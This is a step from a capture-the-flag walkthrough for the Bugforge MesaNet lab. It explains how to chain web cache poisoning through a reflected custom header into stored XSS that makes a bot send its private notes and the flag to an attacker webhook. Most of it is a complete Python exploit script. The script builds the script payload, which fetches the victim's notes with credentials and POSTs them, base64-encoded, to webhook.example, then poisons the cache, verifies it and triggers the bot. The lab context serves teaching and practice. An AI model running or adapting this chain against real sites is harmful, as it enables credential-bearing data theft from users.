
Bugforge MesaNet

Difficulty: hard · CTF challenge · Tags: Web Cache Poisoning, XSS, Header Injection, Stored XSS, CSRF, Bot Exploitation, Exfiltration

MesaNet is a Black Mesa Transit rail broadcast panel running on Bugforge's lab infrastructure. The application caches API responses and reflects a custom header value directly into HTML, creating a chained attack path: poison the cache with a script injected via a custom header, then trick a bot into viewing the poisoned page — causing it to exfiltrate its private notes (and the flag) to an attacker-controlled webhook.

Phase: post_exploitation

Step 7 · Execute the full attack chain and capture the flag

Objective: Within the 60-second cache window, redirect the bot to the poisoned /api/rail/display page so it executes your XSS payload, fetches its own notes from /api/notes/lists via /gateway, and exfiltrates the content — including the flag — to your webhook.

Context: You have (1) a poisoned cache entry for /api/rail/display that serves your XSS for up to 60 seconds, (2) a webhook URL ready to receive the exfiltrated data, and (3) the knowledge that changing 'view':'current' to 'view':'display' in the submission request sends the bot to that page. The whole chain has to complete inside the cache TTL, so re-poison immediately before submitting rather than relying on an entry you created earlier. The bot's request must also hit the same cache key as your poisoning request (same path and query string, no cache-buster), or it will receive a fresh, clean response. Start your webhook listener BEFORE sending the submission: the bot visits once, and a callback that arrives while nobody is listening is lost.

Progressive hints


Hint 1 — directional nudge

Timing matters — you need to poison the cache first, then immediately redirect the bot to the poisoned page before the 60-second cache expires.

Hint 2 — technique / vuln class

Modify the 'Submit for Oversight Review' POST body to change the 'view' value so the bot loads the /api/rail/display endpoint. The bot will execute the cached XSS, which will fetch /api/notes/lists on the bot's behalf and send the result to your webhook.

Hint 3 — near solution

Step 1: Send GET /api/rail/display with your X-Rail-Skin payload. That request populates the cache, so it will usually report X-Cache: MISS; send a second plain GET (no custom header) and confirm X-Cache: HIT with your script present in the body. That second response is what the bot will receive. Step 2: Immediately send the modified POST to /gateway with 'view':'display', well inside the 60-second TTL. Step 3: Watch your webhook for an incoming request carrying the base64-encoded notes. Decode the base64 to reveal the flag.
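The three steps above, as one added script (not the lab's own code, and not the learner's attempt). It assumes a lab host at BASE_URL, that the raw X-Rail-Skin value is reflected unescaped into the HTML body, that the submission is a JSON POST to /gateway carrying the 'view' key the page describes, and that WEBHOOK_URL accepts POST bodies; the bot's fetch of /api/notes/lists is written as a same-origin request with credentials, which is an assumption about how the lab resolves that path. Request building and decoding are kept in small functions so they can be checked offline before touching the lab.

```python
"""Added example: drive the final MesaNet chain end to end.

Assumed (the lab page does not state these): BASE_URL, that X-Rail-Skin is
reflected unescaped, that POST /gateway takes a JSON body with 'view', and
that the webhook accepts POST. Network calls live only in run_chain().
"""
import base64
import json
import time
import urllib.error
import urllib.request

BASE_URL = "http://mesanet.lab"              # assumed lab host
WEBHOOK_URL = "https://webhook.example/xyz"  # assumed listener, started beforehand
CACHE_TTL = 60                               # seconds, per the lab


def build_xss_payload(webhook_url: str) -> str:
    """Script the bot runs: read its notes, base64 them, POST to the webhook.

    A header value must stay on one line, so the JS is fully inlined.
    mode:'no-cors' lets the cross-origin POST leave even if the webhook sends
    no CORS headers; the response is opaque, but only the request matters.
    """
    js = (
        "fetch('/api/notes/lists',{credentials:'include'})"
        ".then(r=>r.text())"
        ".then(t=>fetch('" + webhook_url + "',"
        "{method:'POST',mode:'no-cors',body:btoa(unescape(encodeURIComponent(t)))}))"
    )
    return "<script>" + js + "</script>"


def build_submission(view: str = "display") -> dict:
    """The oversight-review body; the original request carries 'view':'current'."""
    return {"view": view}


def cache_status(headers) -> str:
    """Normalise X-Cache so HIT/MISS checks are case- and whitespace-insensitive."""
    return (headers.get("X-Cache") or "").strip().upper()


def decode_exfil(body_b64: str) -> str:
    """Reverse the btoa() in the payload to recover the notes text."""
    return base64.b64decode(body_b64).decode("utf-8")


def _get(path: str, headers=None):
    req = urllib.request.Request(BASE_URL + path, headers=headers or {})
    with urllib.request.urlopen(req, timeout=10) as resp:
        return resp.headers, resp.read().decode("utf-8", "replace")


def run_chain() -> float:
    """Poison, verify, submit. Returns the cache deadline (monotonic seconds)."""
    payload = build_xss_payload(WEBHOOK_URL)

    # 1. Populate the cache entry; this request itself usually reports MISS.
    hdrs, _ = _get("/api/rail/display", {"X-Rail-Skin": payload})
    deadline = time.monotonic() + CACHE_TTL
    print("poison request X-Cache:", cache_status(hdrs) or "(absent)")

    # 2. Confirm with a plain GET, no custom header: the bot sends that kind of
    #    request, so this is the response it will receive.
    hdrs, body = _get("/api/rail/display")
    if cache_status(hdrs) != "HIT" or payload not in body:
        raise SystemExit("cache not poisoned; check the cache key and TTL")

    # 3. Submit for review with the view switched to 'display'.
    data = json.dumps(build_submission("display")).encode()
    req = urllib.request.Request(
        BASE_URL + "/gateway", data=data,
        headers={"Content-Type": "application/json"}, method="POST")
    with urllib.request.urlopen(req, timeout=10) as resp:
        print("submission status:", resp.status)

    print(f"bot must visit within {deadline - time.monotonic():.0f}s; "
          f"watch {WEBHOOK_URL} and pass the body to decode_exfil()")
    return deadline


if __name__ == "__main__":
    try:
        run_chain()
    except urllib.error.URLError as e:
        raise SystemExit(f"request failed: {e}")
```

The second GET in run_chain is the check that matters: a HIT on your own header-bearing request proves nothing, because the bot will not send X-Rail-Skin. If that plain request comes back clean, the cache key differs from the bot's request or the entry already expired, and submitting would only waste the bot's single visit.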
